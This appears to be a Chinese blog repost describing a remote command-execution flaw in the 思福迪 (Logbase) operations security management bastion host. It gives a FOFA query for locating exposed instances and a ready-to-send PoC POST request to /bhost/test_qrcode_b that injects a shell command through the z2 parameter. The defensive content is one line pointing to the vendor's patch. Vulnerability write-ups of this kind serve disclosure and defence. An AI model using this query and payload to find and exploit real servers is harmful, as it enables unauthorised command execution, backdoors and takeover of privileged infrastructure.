思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

这篇具有很好参考价值的文章主要介绍了思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

0x01 产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。

0x02 漏洞概述

由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:

((title="Logbase" || header="Server: dummy" || body="onclick=\"location.href='trustcert.cgi'") && body!="couchdb") || banner="Server: dummy"

0x04 漏洞复现

PoC

POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: close

z1=1&z2="|whoami;"&z3=bhost

0x05 修复建议

厂商已发布了漏洞修复程序,请及时关注更新:

http://www.logbase.cn/文章来源地址https://www.toymoban.com/news/detail-759653.html

到了这里,关于思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【运维工程师学习二】OS系统管理

    操作系统管理着所有的硬件资源,负责响应各个应用的资源请求。应用还没有运行的时候就只是一堆各种各样的文件( 二进制文件、文本文件 等等),运行的时候,相对系统而言就是进程。比如你启动 apache (linux下知名的web服务端),在系统中就启动了一个(或多个,假如

    2024年02月11日
    浏览(46)
  • 云计算Linux运维——Linux系统管理——网络参数配置

    点关注不迷路 目录 1网络参数配置 一、网络参数 1、主机名 2、查看网卡IP地址 3、查看网关 4、查看DNS服务器地址 二、配置网卡 1、修改网卡配置文件 2、nmcli命令 3、nmcli配置网卡 3)重新加载配置 三、VMware网络工作模式 1、虚拟网络、虚拟网卡 2、虚拟网络工作模式 2双网卡绑

    2024年02月04日
    浏览(46)
  • 图扑 HT for Web 手机端运维管理系统

    随着信息技术的快速发展,网络技术的应用涉及到人们生活的方方面面。其中,手机运维管理系统可提供数字化、智能化的方式,帮助企业和组织管理监控企业的 IT 环境,提高运维效率、降低维护成本、增强安全性、提升服务质量,并支持企业实现数字化转型,满足客户需求

    2024年02月06日
    浏览(39)
  • 手机端运维管理系统——图扑 HT for Web

    随着信息技术的快速发展,网络技术的应用涉及到人们生活的方方面面。其中,手机运维管理系统可提供数字化、智能化的方式,帮助企业和组织管理监控企业的 IT 环境,提高运维效率、降低维护成本、增强安全性、提升服务质量,并支持企业实现数字化转型,满足客户需求

    2024年02月05日
    浏览(40)
  • 多监控系统产生的告警如何高效管理 - 运维事件中心

    随着互联网服务深入千行百业,数字化成为企业和机构为用户提供服务的重要形式。在企业的IT基础架构趋于复杂化的过程中,运维管理工作的技术性也有了更高的要求。如果针对相关的故障,企业无法做到及时的发现和响应,将会延长上层业务中断的事件,缺位的运维将会

    2024年01月16日
    浏览(52)
  • 华为1+X认证网络系统管理与运维中级实验

    实验拓扑 ​ ​ 配置参数 ​ ​ ​ ​ ​ ​ 任务1:设备命名 为了方便后期维护和故障定位及网络的规范性,需要对网络设备进行规范化命名。 请根据Figure 3-1实验考试拓扑对设备进行命名。 命名规则为:城市-设备的设置地点-设备的功能属性和序号-设备型号。 例如::处于

    2024年02月05日
    浏览(63)
  • Acrel-3000水电站厂用电管理系统实现电站的发、用电监控、设备管理和运维管理-安科瑞黄安南

    NB/T 10861-2021《水力发电厂测量装置配置设计规范》对水电厂的测量装置配置做了详细要求和指导。测量装置是水力发电厂运行监测的重要环节,水电厂的测量主要分为电气量测量和非电量测量。电气测量指使用电的方式对电气实时参数进行测量,包括电流、电压、频率、功率

    2024年02月07日
    浏览(43)
  • 基于SaaS模式的Java基层卫生健康云HIS系统源码【运维管理+运营管理+综合监管】

    模板分为两种: 病历模板和报表模板。模板管理是运营管理的核心组成部分,是基层卫生健康云中各医疗机构定制电子病历和报表的地方,各医疗机构可根据自身特点特色定制电子病历和报表,制作的电子病历及报表可直接在业务系统中使用。 病历模板和报表模板的制作方

    2024年02月16日
    浏览(49)
  • 银河麒麟桌面操作系统V10-常见运维问题类别:外设管理 03

    目录 问题类别 3:外设管理 3.1 添加网络共享打印机后,无法进行打印 【适用版本】 【问题现象】 【解决方案】 方法 1:图形软件关闭防火墙。  方法 2:使用命令关闭防火墙。 3.2 系统设置共享打印机问题 【适用版本】 【问题现象】 【解决方案】 3.3 系统共享打印认证问

    2024年02月09日
    浏览(46)
  • Linux系统中实现便捷运维管理和远程访问的1Panel部署方法解析

    1Panel 是一个现代化、开源的 Linux 服务器运维管理面板。高效管理,通过 Web 端轻松管理 Linux 服务器,包括主机监控、文件管理、数据库管理、容器管理等下面我们介绍在Linux 本地安装1Panel 并结合cpolar 内网穿透工具实现远程访问1Panel 管理界面## 1. Linux 安装1Panel执行如下命令一

    2024年02月09日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包